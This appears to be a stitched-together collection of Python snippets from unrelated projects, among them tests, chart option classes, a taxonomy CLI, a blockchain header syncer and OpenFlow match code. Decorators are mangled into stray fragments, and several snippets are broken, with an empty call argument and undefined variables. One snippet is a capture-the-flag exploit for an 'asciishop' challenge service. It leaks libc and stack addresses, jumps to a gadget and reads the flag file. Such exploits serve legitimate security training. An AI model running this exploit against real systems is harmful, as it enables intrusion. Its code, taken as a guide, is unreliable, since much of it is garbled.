config = books.joinpath('config').joinpath('_config_sphinx_multitoc_numbering.yml')
toc = tocs.joinpath(toc_file)
process = subprocess.Popen(['jb', 'build', tocs.as_posix(), '--path-output', books.as_posix(), '--toc', toc.as_posix(), '--config', config.as_posix(), '-W'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
assert (process.returncode == 0), stderr
path_toc_directive = books.joinpath('_build', 'html', 'index.html')
soup = BeautifulSoup(path_toc_directive.read_text(encoding='utf8'), 'html.parser')
toc = soup.select('nav.bd-links')[0]
file_regression.check(toc.prettify(), basename=(toc_file.split('.')[0] + '_multitoc_numbering_false'), extension=f'{SPHINX_VERSION}.html') |
.django_db
def test_ignore_funding_for_unselected_defc(client, monkeypatch, helpers, defc_codes, basic_ref_data, year_2_gtas_covid, year_2_gtas_covid_2):
helpers.patch_datetime_now(monkeypatch, LATE_YEAR, EARLY_MONTH, 25)
helpers.reset_dabs_cache()
resp = client.get((OVERVIEW_URL + '?def_codes=M,A'))
assert (resp.data['funding'] == [{'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'M'}])
assert (resp.data['total_budget_authority'] == YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'])
assert (resp.data['spending']['total_obligations'] == YEAR_2_GTAS_CALCULATIONS['total_obligations'])
assert (resp.data['spending']['total_outlays'] == YEAR_2_GTAS_CALCULATIONS['total_outlays'])
resp = client.get((OVERVIEW_URL + '?def_codes=M,N'))
assert (resp.data['funding'] == [{'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'M'}, {'amount': YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'], 'def_code': 'N'}])
assert (resp.data['total_budget_authority'] == (YEAR_2_GTAS_CALCULATIONS['total_budgetary_resources'] * 2))
assert (resp.data['spending']['total_obligations'] == (YEAR_2_GTAS_CALCULATIONS['total_obligations'] * 2))
assert (resp.data['spending']['total_outlays'] == (YEAR_2_GTAS_CALCULATIONS['total_outlays'] * 2)) |
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def plot_partial_pooling_model(samples: MonteCarloSamples, df: pd.DataFrame) -> Figure:
diagnostics_data = _sample_data_prep(samples, df)
hdi_df = az.hdi(diagnostics_data, hdi_prob=0.89).to_dataframe()
hdi_df = hdi_df.T.rename(columns={'lower': 'hdi_11%', 'higher': 'hdi_89%'})
summary_df = az.summary(diagnostics_data, round_to=4).join(hdi_df)
theta_index = summary_df[summary_df.index.astype(str).str.contains('')].index.values
x = (df['Current hits'] / df['Current at-bats']).values
y = summary_df.loc[(theta_index, 'mean')]
upper_hdi = summary_df.loc[(theta_index, 'hdi_89%')]
lower_hdi = summary_df.loc[(theta_index, 'hdi_11%')]
population_mean = (df['Current hits'] / df['Current at-bats']).mean()
source = ColumnDataSource({'x': x, 'y': y, 'upper_hdi': upper_hdi, 'lower_hdi': lower_hdi, 'name': df['Name'].values})
plot = figure(plot_width=500, plot_height=500, title='Partial pooling', x_axis_label='Observed hits / at-bats', y_axis_label='Predicted chance of a hit', x_range=[0.14, 0.41], y_range=[0.05, 0.55])
plot.line(x=[0, 1], y=[population_mean, population_mean], line_color='orange', line_width=3, level='underlay', legend_label='Population mean')
std_band = Band(base='x', lower='lower_std', upper='upper_std', source=source, level='underlay', fill_alpha=0.2, fill_color='orange', line_width=0.2, line_color='orange')
plot.add_layout(std_band)
plot.line(x=x, y=(df['Current hits'] / df['Current at-bats']).values, line_color='grey', line_alpha=0.7, line_width=2.0, legend_label='Current hits / Current at-bats')
whiskers = Whisker(base='x', upper='upper_hdi', lower='lower_hdi', source=source, line_color='steelblue')
whiskers.upper_head.line_color = 'steelblue'
whiskers.lower_head.line_color = 'steelblue'
plot.add_layout(whiskers)
glyph = plot.circle(x='x', y='y', source=source, size=10, line_color='white', fill_color='steelblue', legend_label='Players')
tooltips = HoverTool(renderers=[glyph], tooltips=[('Name', ''), ('Posterior Upper HDI', '_hdi{0.000}'), ('Posterior Mode', '{0.000}'), ('Posterior Lower HDI', '_hdi{0.000}')])
plot.add_tools(tooltips)
plot.legend.location = 'top_left'
plot.legend.click_policy = 'mute'
plots.style(plot)
return plot |
def test_documentLib(tmpdir):
tmpdir = str(tmpdir)
testDocPath1 = os.path.join(tmpdir, 'testDocumentLibTest.designspace')
doc = DesignSpaceDocument()
a1 = AxisDescriptor()
a1.tag = 'TAGA'
a1.name = 'axisName_a'
a1.minimum = 0
a1.maximum = 1000
a1.default = 0
doc.addAxis(a1)
dummyData = dict(a=123, b='abc', c=[1, 2, 3], d={'a': 123})
dummyKey = 'org.fontTools.designspaceLib'
doc.lib = {dummyKey: dummyData}
doc.write(testDocPath1)
new = DesignSpaceDocument()
new.read(testDocPath1)
assert (dummyKey in new.lib)
assert (new.lib[dummyKey] == dummyData) |
def run(args):
import re
from .. import PhyloTree, NCBITaxa
if ((not args.tree) and (not args.info) and (not args.descendants)):
args.tree = True
ncbi = NCBITaxa(args.dbfile, args.taxdumpfile)
if args.create:
sys.exit(0)
all_taxids = {}
all_names = set()
queries = []
if (not args.search):
log.error('Search terms should be provided (i.e. --search) ')
sys.exit((- 1))
for n in args.search:
queries.append(n)
try:
all_taxids[int(n)] = None
except ValueError:
all_names.add(n.strip())
name2tax = ncbi.get_name_translator(all_names)
for tids in name2tax.values():
for tid in tids:
all_taxids[tid] = None
not_found_names = (all_names - set(name2tax.keys()))
if (args.fuzzy and not_found_names):
log.warn('%s unknown names', len(not_found_names))
for name in not_found_names:
(tax, realname, sim) = ncbi.get_fuzzy_name_translation(name, args.fuzzy)
if tax:
all_taxids[tax] = None
name2tax[name] = [tax]
name2realname[name] = realname
name2score[name] = ('Fuzzy:%0.2f' % sim)
if not_found_names:
log.warn(('[%s] could not be translated into taxids!' % ','.join(not_found_names)))
if args.tree:
if (len(all_taxids) == 1):
target_taxid = list(all_taxids.keys())[0]
log.info(('Dumping NCBI descendants tree for %s' % target_taxid))
t = ncbi.get_descendant_taxa(target_taxid, collapse_subspecies=args.collapse_subspecies, rank_limit=args.rank_limit, return_tree=True)
else:
log.info(('Dumping NCBI taxonomy of %d taxa...' % len(all_taxids)))
t = ncbi.get_topology(list(all_taxids.keys()), intermediate_nodes=args.full_lineage, rank_limit=args.rank_limit, collapse_subspecies=args.collapse_subspecies)
id2name = ncbi.get_taxid_translator([n.name for n in t.traverse()])
for n in t.traverse():
n.add_properties(taxid=n.name)
n.add_properties(sci_name=str(id2name.get(int(n.name), '?')))
n.name = ('%s - %s' % (id2name.get(int(n.name), n.name), n.name))
lineage = ncbi.get_lineage(n.taxid)
n.add_properties(named_lineage='|'.join(ncbi.translate_to_names(lineage)))
dump(t, properties=['taxid', 'name', 'rank', 'bgcolor', 'sci_name', 'collapse_subspecies', 'named_lineage'])
elif args.descendants:
log.info(('Dumping NCBI taxonomy of %d taxa...' % len(all_taxids)))
print(('# ' + '\t'.join(['Taxid', 'Sci.Name', 'Rank', 'descendant_taxids', 'descendant_names'])))
translator = ncbi.get_taxid_translator(all_taxids)
ranks = ncbi.get_rank(all_taxids)
for taxid in all_taxids:
descendants = ncbi.get_descendant_taxa(taxid, collapse_subspecies=args.collapse_subspecies, rank_limit=args.rank_limit)
print('\t'.join([str(taxid), translator.get(taxid, taxid), ranks.get(taxid, ''), '|'.join(map(str, descendants)), '|'.join(map(str, ncbi.translate_to_names(descendants)))]))
elif args.info:
print(('# ' + '\t'.join(['Taxid', 'Sci.Name', 'Rank', 'Named Lineage', 'Taxid Lineage'])))
translator = ncbi.get_taxid_translator(all_taxids)
ranks = ncbi.get_rank(all_taxids)
for (taxid, name) in translator.items():
lineage = ncbi.get_lineage(taxid)
named_lineage = ','.join(ncbi.translate_to_names(lineage))
lineage_string = ','.join(map(str, lineage))
print('\t'.join([str(taxid), name, ranks.get(taxid, ''), named_lineage, lineage_string])) |
class AirflowTaskResolver(TrackedInstance, TaskResolverMixin):
def name(self) -> str:
return 'AirflowTaskResolver'
('Load airflow task')
def load_task(self, loader_args: typing.List[str]) -> typing.Union[(airflow_models.BaseOperator, airflow_sensors.BaseSensorOperator, airflow_triggers.BaseTrigger)]:
(_, task_module, _, task_name, _, task_config) = loader_args
task_module = importlib.import_module(name=task_module)
task_def = getattr(task_module, task_name)
return task_def(name=task_name, task_config=jsonpickle.decode(task_config))
def loader_args(self, settings: SerializationSettings, task: PythonAutoContainerTask) -> typing.List[str]:
return ['task-module', task.__module__, 'task-name', task.__class__.__name__, 'task-config', jsonpickle.encode(task.task_config)]
def get_all_tasks(self) -> typing.List[PythonAutoContainerTask]:
raise Exception('should not be needed') |
def test_id_included(caplog):
test_id = '1.1'
test_level = 1
custom_config = SimpleNamespace(includes=['1.1'], excludes=None, level=0, log_level='DEBUG')
test = CISAudit(config=custom_config)
result = test._is_test_included(test_id, test_level)
assert (caplog.records[0].msg == f'Checking whether to run test {test_id}')
assert (caplog.records[1].msg == f'Test {test_id} was explicitly included')
assert (caplog.records[2].msg == f'Including test {test_id}')
assert (len(caplog.records) == 3)
assert (result is True) |
class OptionPlotoptionsWindbarbSonificationDefaultinstrumentoptionsMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Test_SetWindowSet():
()
def wrapper(self):
return Mock(name='wrapper')
()
def wset(self, *, key, table, wrapper):
return SetWindowSet(key, table, wrapper)
def test_add(self, *, wset):
event = Mock(name='event')
wset._apply_set_operation = Mock()
wset.add('value', event=event)
wset._apply_set_operation.assert_called_once_with('add', 'value', event)
def test_discard(self, *, wset):
event = Mock(name='event')
wset._apply_set_operation = Mock()
wset.discard('value', event=event)
wset._apply_set_operation.assert_called_once_with('discard', 'value', event)
def test__apply_set_operation(self, *, wset, key, table, wrapper):
event = Mock(name='event')
wrange1 = Mock(name='window_range1')
wrange2 = Mock(name='window_range2')
table._window_ranges.return_value = [wrange1, wrange2]
wset._apply_set_operation('op', 'value', event)
wset.wrapper.get_timestamp.assert_called_once_with(event)
wrapper.on_set_key.assert_called_once_with(key, 'value')
table._get_key.assert_has_calls([call((key, wrange1)), call().op('value'), call((key, wrange2)), call().op('value')]) |
class FillMissingWithMean(elmdptt.TaskOneToOne):
col_names = luigi.Parameter()
def actual_task_code(self, df: pd.DataFrame):
if (self.col_names == 'all'):
df.fillna(df.mean(), inplace=True)
else:
for col_name in str(self.col_names).split(','):
df[col_name].fillna(df[col_name].mean(), inplace=True)
return df |
.WebInterfaceUnitTestConfig(database_mock_class=DbMock)
class TestShowStatistic():
def test_no_stats_available(self, test_client):
DbMock.result = None
rv = test_client.get('/statistic')
assert (b'General' not in rv.data)
assert (b'<strong>No statistics available!</strong>' in rv.data)
def test_stats_available(self, test_client):
DbMock.result = {'number_of_firmwares': 1, 'total_firmware_size': 1, 'average_firmware_size': 1, 'number_of_unique_files': 1, 'total_file_size': 10, 'average_file_size': 10, 'creation_time': time(), 'benchmark': 1.1}
page_content = test_client.get('/statistic').data.decode()
assert ('General' in page_content)
assert ('>10.00 Byte<' in page_content) |
def main():
config.load()
postgres = BackendDbInterface()
mongo_config = ConfigParser()
mongo_config.read(((Path(__file__).parent / 'config') / 'migration.cfg'))
try:
with ConnectTo(MigrationMongoInterface, mongo_config) as db:
with Progress(DESCRIPTION, BarColumn(), PERCENTAGE, TimeElapsedColumn()) as progress:
migrator = DbMigrator(postgres=postgres, mongo=db, progress=progress)
migrated_fw_count = migrator.migrate_fw(query={}, root=True, label='firmwares')
if (not migrated_fw_count):
print('No firmware to migrate')
else:
print(f'Successfully migrated {migrated_fw_count} firmware DB entries')
migrate_comparisons(db)
except errors.ServerSelectionTimeoutError:
logging.error('Could not connect to MongoDB database.\n\tIs the server running and the configuration in `src/config/migration.cfg` correct?\n\tThe database can be started with `mongod --config config/mongod.conf`.')
sys.exit(1) |
def test_get_invalid_business_category_display_names():
business_category_field_names_list = _get_all_business_category_field_names()
business_category_field_names_list.insert(0, 'invalid_name_1')
business_category_field_names_list.append('invalid_name_2')
business_category_display_names_list = _get_all_business_category_display_names()
assert (get_business_category_display_names(business_category_field_names_list) == business_category_display_names_list) |
def test_resize():
assert (Integer.int32_t().resize(64) == Integer.int64_t())
assert (Float.float().resize(64) == Float.double())
assert ((Integer.uint8_t() + Integer.int16_t()) == Integer(24, signed=False))
assert ((CustomType.void() + CustomType.void()) == CustomType.void())
assert ((CustomType.bool().size + Float.float().size) == CustomType('bool', (32 + SIZEOF_BOOL)).size) |
def test_simple_plot(tmpdir, show_plot, generate_plot):
mywell = xtgeo.well_from_file(USEFILE4)
mysurfaces = []
mysurf = xtgeo.surface_from_file(USEFILE2)
for i in range(10):
xsurf = mysurf.copy()
xsurf.values = (xsurf.values + (i * 20))
xsurf.name = f'Surface_{i}'
mysurfaces.append(xsurf)
myplot = XSection(zmin=1500, zmax=1800, well=mywell, surfaces=mysurfaces)
clist = [0, 1, 222, 3, 5, 7, 3, 12, 11, 10, 9, 8]
cfil1 = 'xtgeo'
cfil2 = (TPATH / 'etc/colortables/colfacies.txt')
assert (222 in clist)
assert ('xtgeo' in cfil1)
assert ('colfacies' in str(cfil2))
myplot.colormap = cfil1
myplot.canvas(title='Manamana', subtitle='My Dear Well')
myplot.plot_surfaces(fill=False)
myplot.plot_well(zonelogname='Zonelog')
if show_plot:
myplot.show()
if generate_plot:
myplot.savefig(join(tmpdir, 'xsect_gbf1.png'), last=True)
else:
myplot.close() |
def flatten_coords(in_coords):
if isinstance(in_coords, g_l_y_f.GlyphComponent):
return in_coords.getComponentInfo()
elif hasattr(in_coords, 'coordinates'):
ret = list(in_coords.coordinates)
ret.sort()
return tuple(ret)
elif hasattr(in_coords, 'components'):
ret = [flatten_coords(tmp) for tmp in in_coords.components]
ret.sort()
return tuple(ret)
elif isinstance(in_coords, list):
ret = [flatten_coords((subitem for subitem in in_coords))]
ret.sort()
return tuple(ret)
elif (hasattr(in_coords, 'numberOfContours') and (in_coords.numberOfContours == 0)):
return tuple()
else:
return tuple() |
class SkeletonSyncer(Service, Generic[TChainPeer]):
_skip_length = (MAX_HEADERS_FETCH + 1)
max_reorg_depth = MAX_SKELETON_REORG_DEPTH
_fetched_headers: 'asyncio.Queue[Tuple[BlockHeaderAPI, ...]]'
def __init__(self, chain: AsyncChainAPI, db: BaseAsyncHeaderDB, peer: TChainPeer, launch_strategy: SyncLaunchStrategyAPI=None) -> None:
self.logger = get_logger('trinity.sync.common.headers.SkeletonSyncer')
self._chain = chain
self._db = db
if (launch_strategy is None):
launch_strategy = FromGenesisLaunchStrategy(db)
self._launch_strategy = launch_strategy
self.peer = peer
max_pending_headers = (peer.max_headers_fetch * 8)
self._fetched_headers = asyncio.Queue(max_pending_headers)
async def skeleton_segments(self) -> AsyncIterator[Tuple[(BlockHeaderAPI, ...)]]:
while self.manager.is_running:
(yield (await self._fetched_headers.get()))
self._fetched_headers.task_done()
async def run(self) -> None:
self.manager.run_daemon_task(self._display_stats)
try:
(await self._quietly_fetch_full_skeleton())
self.logger.debug2('Skeleton %s stopped responding, pausing for headers to emit', self.peer)
(await self._fetched_headers.join())
except asyncio.CancelledError:
self.logger.debug('Skeleton syncer had %d pending headers when it was cancelled', self._fetched_headers.qsize())
raise
self.logger.debug2('Skeleton %s emitted all headers', self.peer)
self.manager.cancel()
async def _display_stats(self) -> None:
queue = self._fetched_headers
while self.manager.is_running:
(await asyncio.sleep(5))
self.logger.debug('Skeleton header queue is %d/%d full', queue.qsize(), queue.maxsize)
async def _quietly_fetch_full_skeleton(self) -> None:
try:
(await self._fetch_full_skeleton())
except ValidationError as exc:
self.logger.debug('Exiting sync and booting %s due to validation error: %s', self.peer, exc)
except asyncio.TimeoutError:
self.logger.warning('Timeout waiting for header batch from %s, halting sync', self.peer)
async def _fetch_full_skeleton(self) -> None:
peer = self.peer
launch_headers = (await self._find_launch_headers(peer))
self._fetched_headers.put_nowait(launch_headers)
previous_tail_header = launch_headers[(- 1)]
start_num = BlockNumber((previous_tail_header.block_number + self._skip_length))
while self.manager.is_running:
parents = (await self._fetch_headers_from(peer, start_num))
if (not parents):
break
children = (await self._fetch_headers_from(peer, BlockNumber((start_num + 1))))
if (not children):
break
pairs = tuple(zip(parents, children))
try:
validate_pair_coros = (self._chain.coro_validate_chain(parent, (child,)) for (parent, child) in pairs)
(await asyncio.gather(*validate_pair_coros))
except ValidationError as e:
self.logger.warning('Received an invalid header pair from %s: %s', peer, e)
raise
if (len(pairs) >= 2):
gap_index = randrange(0, (len(pairs) - 1))
segments = (await self._fill_in_gap(peer, pairs, gap_index))
if (len(segments) == 0):
raise ValidationError('Unexpected - filling in gap silently returned no headers')
else:
segments = pairs
previous_lead_header = segments[0][0]
previous_tail_header = segments[(- 1)][(- 1)]
self.logger.debug('Got new header bones from %s: %s-%s', peer, previous_lead_header, previous_tail_header)
for segment in segments:
if (len(segment) > 0):
(await self._fetched_headers.put(segment))
else:
raise ValidationError(f'Found empty header segment in {segments}')
start_num = BlockNumber(((previous_tail_header.block_number + self._skip_length) - 1))
(await self._get_final_headers(peer, previous_tail_header))
async def _get_final_headers(self, peer: TChainPeer, previous_tail_header: BlockHeaderAPI) -> None:
while self.manager.is_running:
final_headers = (await self._fetch_headers_from(peer, BlockNumber((previous_tail_header.block_number + 1)), skip=0))
if (len(final_headers) == 0):
break
(await self._chain.coro_validate_chain(previous_tail_header, final_headers, SEAL_CHECK_RANDOM_SAMPLE_RATE))
(await self._fetched_headers.put(final_headers))
previous_tail_header = final_headers[(- 1)]
async def _find_newest_matching_skeleton_header(self, peer: TChainPeer) -> BlockHeaderAPI:
start_num = (await self._launch_strategy.get_starting_block_number())
skip = (MAX_HEADERS_FETCH - 1)
skeleton_launch_headers = (await self._fetch_headers_from(peer, start_num, skip=skip))
if (len(skeleton_launch_headers) == 0):
raise ValidationError(f'{peer} gave 0 headers when seeking common skeleton ancestors from {start_num}')
first = skeleton_launch_headers[0]
first_is_present = (await self._is_header_imported(first))
if (not first_is_present):
(await self._log_ancester_failure(peer, first))
raise ValidationError(f'No common ancestor with {peer}, who started with {first}')
elif (len(skeleton_launch_headers) == 1):
return skeleton_launch_headers[0]
else:
for (parent, child) in sliding_window(2, skeleton_launch_headers):
is_present = (await self._is_header_imported(child))
if (not is_present):
return parent
else:
return skeleton_launch_headers[(- 1)]
async def _is_header_imported(self, header: BlockHeaderAPI) -> bool:
if (not (await self._db.coro_header_exists(header.hash))):
return False
else:
try:
(await self._db.coro_get_score(header.hash))
except HeaderNotFound:
return False
else:
return True
async def _find_launch_headers(self, peer: TChainPeer) -> Tuple[(BlockHeaderAPI, ...)]:
newest_matching_header = (await self._find_newest_matching_skeleton_header(peer))
start_num = BlockNumber((newest_matching_header.block_number + 1))
launch_headers = (await self._fetch_headers_from(peer, start_num, skip=0))
if (len(launch_headers) == 0):
raise ValidationError(f'{peer} gave 0 headers when seeking common meat ancestors from {start_num}')
(completed_headers, new_headers) = (await skip_complete_headers(launch_headers, self._is_header_imported))
if completed_headers:
self.logger.debug('During header sync launch, skipping over (%d) already stored headers %s: %s..%s', len(completed_headers), humanize_integer_sequence((h.block_number for h in completed_headers)), completed_headers[0], completed_headers[(- 1)])
if (len(new_headers) == 0):
self.logger.debug('Canonical head updated while finding new head from %s, returning old %s instead', peer, launch_headers[(- 1)])
return (launch_headers[(- 1)],)
else:
try:
launch_parent = (await self._db.coro_get_block_header_by_hash(new_headers[0].parent_hash))
except HeaderNotFound as exc:
raise ValidationError(f'First header {new_headers[0]} did not have parent in DB') from exc
(await self._chain.coro_validate_chain(launch_parent, new_headers, SEAL_CHECK_RANDOM_SAMPLE_RATE))
return new_headers
async def _fill_in_gap(self, peer: TChainPeer, pairs: Tuple[(Tuple[(BlockHeaderAPI, ...)], ...)], gap_index: int) -> Tuple[(Tuple[(BlockHeaderAPI, ...)], ...)]:
if (not (0 <= gap_index < (len(pairs) - 1))):
raise ValidationError(f'Tried to fill gap #{gap_index} in skeleton, with only {(len(pairs) - 1)} gaps')
gap_parent = pairs[gap_index][(- 1)]
gap_child = pairs[(gap_index + 1)][0]
start_num = BlockNumber((gap_parent.block_number + 1))
max_headers = ((gap_child.block_number - gap_parent.block_number) - 1)
gap_headers = (await self._fetch_headers_from(peer, start_num, max_headers, skip=0))
if (len(gap_headers) == 0):
self.logger.warning('Skeleton %s could not fill header gap with headers at %s', peer, start_num)
raise ValidationError(f'Skeleton {peer} could not return headers at {start_num}')
filled_gap_children = tuple(concatv(gap_headers, pairs[(gap_index + 1)]))
try:
(await self._chain.coro_validate_chain(gap_parent, filled_gap_children, SEAL_CHECK_RANDOM_SAMPLE_RATE))
except ValidationError:
self.logger.warning('%s returned an invalid gap for index %s, with pairs %s, filler %s', peer, gap_index, pairs, gap_headers)
raise
else:
return tuple(concatv(pairs[:(gap_index + 1)], (filled_gap_children,), pairs[(gap_index + 2):]))
async def _fetch_headers_from(self, peer: TChainPeer, start_at: BlockNumber, max_headers: int=None, skip: int=None) -> Tuple[(BlockHeaderAPI, ...)]:
if (not peer.is_alive):
self.logger.info('%s disconnected while fetching headers', peer)
return tuple()
if (skip is not None):
derived_skip = skip
else:
derived_skip = self._skip_length
if (max_headers is None):
header_limit = peer.max_headers_fetch
else:
header_limit = min(max_headers, peer.max_headers_fetch)
try:
self.logger.debug('Requsting chain of headers from %s starting at #%d', peer, start_at)
headers = (await peer.chain_api.get_block_headers(start_at, header_limit, derived_skip, reverse=False))
self.logger.debug2('sync received new headers: %s', loggable(headers))
except PeerConnectionLost:
self.logger.debug('Lost connection to %s while retrieving headers', peer)
return tuple()
except asyncio.TimeoutError:
self.logger.debug('Timeout waiting for headers (skip=%s) from %s', skip, peer)
return tuple()
except ValidationError as err:
self.logger.warning('Invalid header response sent by peer %s: %s', peer, err)
return tuple()
if (not headers):
self.logger.debug2('Got no new headers from %s, exiting skeleton sync', peer)
return tuple()
else:
return headers
async def _log_ancester_failure(self, peer: TChainPeer, first_header: BlockHeaderAPI) -> None:
self.logger.info('Unable to find common ancestor betwen our chain and %s', peer)
block_num = first_header.block_number
try:
local_header = (await self._db.coro_get_canonical_block_header_by_number(block_num))
except HeaderNotFound as exc:
self.logger.debug('Could not find any header at #%d: %s', block_num, exc)
local_header = None
self.logger.debug('%s returned starting header %s, which is not in our DB. Instead at #%d, our is header %s', peer, first_header, block_num, local_header) |
def manage_prescriptions(invoiced, ref_dt, ref_dn, dt, created_check_field):
created = frappe.db.get_value(ref_dt, ref_dn, created_check_field)
if created:
doc_created = frappe.db.get_value(dt, {'prescription': ref_dn})
frappe.db.set_value(dt, doc_created, 'invoiced', invoiced) |
class SynthesizeRule(SemanticRule):
def __init__(self, func, arguments, dependencies, name, source_location=None, annotations=None, target=None):
super().__init__(func, arguments, dependencies, name, source_location, annotations)
self.target = ('self', (target or name))
def __repr__(self):
if self.source_location:
(file, line) = self.source_location
return f'SynthesizeRule {self.name} (File "{file}", line {line})'
else:
return (f'SynthesizeRule {self.name}' + (f' ({self.annotations})' if self.annotations else '')) |
def test_empty_endless_loop(task):
task.graph.add_node((block := BasicBlock(0, instructions=[])))
task.graph.add_edge(UnconditionalEdge(block, block))
PatternIndependentRestructuring().run(task)
context = LogicCondition.generate_new_context()
while_loop = WhileLoopNode(LogicCondition.initialize_true(context), reaching_condition=LogicCondition.initialize_true(context))
resulting_ast = AbstractSyntaxTree(while_loop, {})
loop_body = resulting_ast._add_code_node([])
resulting_ast._add_edge(while_loop, loop_body)
assert (ASTComparator.compare(task.syntax_tree, resulting_ast) and (task.syntax_tree.condition_map == resulting_ast.condition_map)) |
class ASTComparator():
def __init__(self):
self._color_of_node: Dict[(AbstractSyntaxTreeNode, Color)] = dict()
def compare(cls, ast_forest_1: AbstractSyntaxInterface, ast_forest_2: AbstractSyntaxInterface) -> bool:
if (id(ast_forest_1) == id(ast_forest_2)):
return True
ast_forest_1.clean_up()
ast_forest_2.clean_up()
if ((type(ast_forest_1) != type(ast_forest_2)) and (set(ast_forest_1.get_roots) != set(ast_forest_2.get_roots))):
return False
graph_coloring_generator = cls()
graph_coloring_generator.color_as_forest(ast_forest_1)
graph_coloring_generator.color_as_forest(ast_forest_2)
ast_forest_1_roots = {graph_coloring_generator.color_of_node(root) for root in ast_forest_1.get_roots}
ast_forest_2_roots = {graph_coloring_generator.color_of_node(root) for root in ast_forest_2.get_roots}
return (ast_forest_1_roots == ast_forest_2_roots)
def color_of_node(self, node: AbstractSyntaxTreeNode) -> Optional[Color]:
return self._color_of_node.get(node)
def color_as_forest(self, as_forest: AbstractSyntaxInterface) -> None:
for node in as_forest.post_order():
self._color_of_node[node] = self._compute_color_of(node)
def _get_children_classes(self, node: AbstractSyntaxTreeNode) -> Tuple[(Color, ...)]:
if (isinstance(node, ConditionNode) and (node.false_branch is not None)):
if (self._color_of_node[node.true_branch_child] > self._color_of_node[node.false_branch_child]):
node.switch_branches()
self._color_of_node[node.true_branch] = self._compute_color_of(node.true_branch)
self._color_of_node[node.false_branch] = self._compute_color_of(node.false_branch)
return (self._color_of_node[node.true_branch], self._color_of_node[node.false_branch])
return tuple((self._color_of_node[child] for child in node.children))
def _compute_color_of(self, node: AbstractSyntaxTreeNode) -> Color:
children: Tuple[(Color, ...)] = self._get_children_classes(node)
identifier = f'{node}, {children}'
return Color(hash(identifier)) |
def exploit(start):
global p
def go(aslr=False):
global p
p = process('./asciishop', aslr=True, env={})
if (not aslr):
gdb.attach(p, gdbscript='\n c\n ')
else:
gdb.attach(p, gdbscript='\n #break *0xd0f\n #break *0xb8f\n #break *0xbc\n #break *0xb1f\n c\n ')
return
p = remote('challenges.fbctf.com', 1340)
(first, second, data, index) = find_thread_local_storage()
stack_leak_offset = (index + 6112)
safe_stack_leak = u64(data[stack_leak_offset:(stack_leak_offset + 8)])
libc_leak_offset = (index + 720)
libc_leak = u64(data[libc_leak_offset:(libc_leak_offset + 8)])
libc_base = (libc_leak - 96179)
magic_gadget = (libc_base + 324386)
delete_image(second)
upload_image(second, 1, 1, , ('Q' * 200))
set_unsafe_stack(second, safe_stack_leak, (stack_leak_offset - 1696))
destroy_safe_stack(magic_gadget, start)
p.sendline('cat /home/asciishop/flag')
print(p.readline('\n'))
print(p.readline('\n'))
print(p.readline('\n')) |
class OFPMatch(StringifyMixin):
def __init__(self, type_=None, length=None, _ordered_fields=None, **kwargs):
super(OFPMatch, self).__init__()
self._wc = FlowWildcards()
self._flow = Flow()
self.fields = []
self.type = ofproto.OFPMT_OXM
self.length = length
if (_ordered_fields is not None):
assert (not kwargs)
self._fields2 = _ordered_fields
else:
kwargs = dict((ofproto.oxm_normalize_user(k, v) for (k, v) in kwargs.items()))
fields = [ofproto.oxm_from_user(k, v) for (k, v) in kwargs.items()]
fields.sort(key=(lambda x: (x[0][0] if isinstance(x[0], tuple) else x[0])))
self._fields2 = [ofproto.oxm_to_user(n, v, m) for (n, v, m) in fields]
def __getitem__(self, key):
return dict(self._fields2)[key]
def __contains__(self, key):
return (key in dict(self._fields2))
def iteritems(self):
return iter(dict(self._fields2).items())
def items(self):
return self._fields2
def get(self, key, default=None):
return dict(self._fields2).get(key, default)
def stringify_attrs(self):
(yield ('oxm_fields', dict(self._fields2)))
def to_jsondict(self):
if self._composed_with_old_api():
o2 = OFPMatch()
o2.fields = self.fields[:]
buf = bytearray()
o2.serialize(buf, 0)
o = OFPMatch.parser(six.binary_type(buf), 0)
else:
o = self
body = {'oxm_fields': [ofproto.oxm_to_jsondict(k, uv) for (k, uv) in o._fields2], 'length': o.length, 'type': o.type}
return {self.__class__.__name__: body}
def from_jsondict(cls, dict_):
fields = [ofproto.oxm_from_jsondict(f) for f in dict_['oxm_fields']]
o = OFPMatch(_ordered_fields=fields)
buf = bytearray()
o.serialize(buf, 0)
return OFPMatch.parser(six.binary_type(buf), 0)
def __str__(self):
if self._composed_with_old_api():
o2 = OFPMatch()
o2.fields = self.fields[:]
buf = bytearray()
o2.serialize(buf, 0)
o = OFPMatch.parser(six.binary_type(buf), 0)
else:
o = self
return super(OFPMatch, o).__str__()
__repr__ = __str__
def append_field(self, header, value, mask=None):
self.fields.append(OFPMatchField.make(header, value, mask))
def _composed_with_old_api(self):
return ((self.fields and (not self._fields2)) or (self._wc.__dict__ != FlowWildcards().__dict__))
def serialize(self, buf, offset):
if self._composed_with_old_api():
return self.serialize_old(buf, offset)
fields = [ofproto.oxm_from_user(k, uv) for (k, uv) in self._fields2]
hdr_pack_str = '!HH'
field_offset = (offset + struct.calcsize(hdr_pack_str))
for (n, value, mask) in fields:
field_offset += ofproto.oxm_serialize(n, value, mask, buf, field_offset)
length = (field_offset - offset)
msg_pack_into(hdr_pack_str, buf, offset, ofproto.OFPMT_OXM, length)
self.length = length
pad_len = (utils.round_up(length, 8) - length)
msg_pack_into(('%dx' % pad_len), buf, field_offset)
return (length + pad_len)
def serialize_old(self, buf, offset):
if hasattr(self, '_serialized'):
raise Exception('serializing an OFPMatch composed with old API multiple times is not supported')
self._serialized = True
